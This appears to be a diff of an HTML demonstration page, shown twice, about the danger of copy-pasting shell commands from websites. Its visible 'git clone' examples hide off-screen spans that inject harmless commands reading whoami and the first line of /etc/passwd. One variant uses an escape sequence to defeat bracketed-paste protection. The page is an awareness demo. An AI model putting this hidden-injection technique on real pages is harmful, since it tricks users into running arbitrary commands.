rmetzler · October 26, 2023 21:23
diff --git a/website-terminal-copy-paste.html b/website-terminal-copy-paste.html
 <!DOCTYPE html>
 <html>
  <head>
    <title>Copy-Paste from Website to Terminal</title>
  </head>
  <style>
    .codeblock {
      background-color: lightyellow;
      border: 1px dotted blue;
      margin-left: 50px;
      display: inline-block;
    }
  </style>
  <body>
    <p>
      You surely know this: You're looking at some website with some useful
      shell commands. However, those commands are long as hell and you know
      you're probably not gonna need them for a few years or so (so there's
      no need to memorize them). So, what
      do you do? You copy-paste them. Here's an example:
    </p>
    <p class="codeblock">
      <!-- Oh noes, you found it! -->
      git clone
      <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!<br>Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd<br>git clone </span>
      git://git.kernel.org/pub/scm/utils/kup/kup.git
    </p>
    <p>
      Try running this command in your terminal. It's supposed to be harmless,
      right? It is harmless, yes, but what happens still isn't what you'd
      expect and demonstrates the dangers in doing stuff like that. Mark it
      with your mouse, copy it somehow (e.g. using CTRL+C) and paste it into
      a terminal. What happens?
    </p>
    <p>
      There are some good comments and suggestions on how you can mitigate
      this kind of attack on
      <a href="http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/">reddit</a>
      and
      <a href="https://news.ycombinator.com/item?id=5508225">Hacker News</a>.
      <s>Also, <a href="https://github.com/robbyrussell/oh-my-zsh">oh-my-zsh</a> now includes
      <a href="https://github.com/robbyrussell/oh-my-zsh/pull/1698">a fix for this issue</a>
      (which relies on
      <a href="http://www.xfree86.org/current/ctlseqs.html#Bracketed%20Paste%20Mode">Bracketed Paste Mode</a>
      support in the terminal).</s>
      Oh, and it seems that
      <a href="http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt">other people wrote a detailed text about this issue in 2008</a>.
    </p>
    <p>
      Please note that <b>Bracketed Paste Mode DOES NOT always fix this because the end sequence can be inside the text you paste unless your terminal
      emulator filters out the bracketed paste characters when pasting! For those of you who
      have installed the oh-my-zsh stuff, the following variant (which includes an escape sequence) might still work against you:</b>
    </p>
    <p class="codeblock">
      git clone
      <span style="position: absolute; left: -100px; top: -100px">&#27;[201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!<br>Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd<br>git clone </span>
      git://git.kernel.org/pub/scm/utils/kup/kup.git
    </p>
  </body>
 </html>
	<!DOCTYPE html>
	<html>
	<head>
	<title>Copy-Paste from Website to Terminal</title>
	</head>
	<style>
	.codeblock {
	background-color: lightyellow;
	border: 1px dotted blue;
	margin-left: 50px;
	display: inline-block;
	}
	</style>
	<body>
	<p>
	You surely know this: You're looking at some website with some useful
	shell commands. However, those commands are long as hell and you know
	you're probably not gonna need them for a few years or so (so there's
	no need to memorize them). So, what
	do you do? You copy-paste them. Here's an example:
	</p>
	<p class="codeblock">
	<!-- Oh noes, you found it! -->
	git clone
	<span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hello ";whoami\|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!<br>Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd<br>git clone </span>
	git://git.kernel.org/pub/scm/utils/kup/kup.git
	</p>
	<p>
	Try running this command in your terminal. It's supposed to be harmless,
	right? It is harmless, yes, but what happens still isn't what you'd
	expect and demonstrates the dangers in doing stuff like that. Mark it
	with your mouse, copy it somehow (e.g. using CTRL+C) and paste it into
	a terminal. What happens?
	</p>
	<p>
	There are some good comments and suggestions on how you can mitigate
	this kind of attack on
	<a href="http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/">reddit</a>
	and
	<a href="https://news.ycombinator.com/item?id=5508225">Hacker News</a>.
	<s>Also, <a href="https://github.com/robbyrussell/oh-my-zsh">oh-my-zsh</a> now includes
	<a href="https://github.com/robbyrussell/oh-my-zsh/pull/1698">a fix for this issue</a>
	(which relies on
	<a href="http://www.xfree86.org/current/ctlseqs.html#Bracketed%20Paste%20Mode">Bracketed Paste Mode</a>
	support in the terminal).</s>
	Oh, and it seems that
	<a href="http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt">other people wrote a detailed text about this issue in 2008</a>.
	</p>
	<p>
	Please note that <b>Bracketed Paste Mode DOES NOT always fix this because the end sequence can be inside the text you paste unless your terminal
	emulator filters out the bracketed paste characters when pasting! For those of you who
	have installed the oh-my-zsh stuff, the following variant (which includes an escape sequence) might still work against you:</b>
	</p>
	<p class="codeblock">
	git clone
	<span style="position: absolute; left: -100px; top: -100px">[201~/dev/null; clear; echo -n "Hello ";whoami\|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!<br>Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd<br>git clone </span>
	git://git.kernel.org/pub/scm/utils/kup/kup.git
	</p>
	</body>
	</html>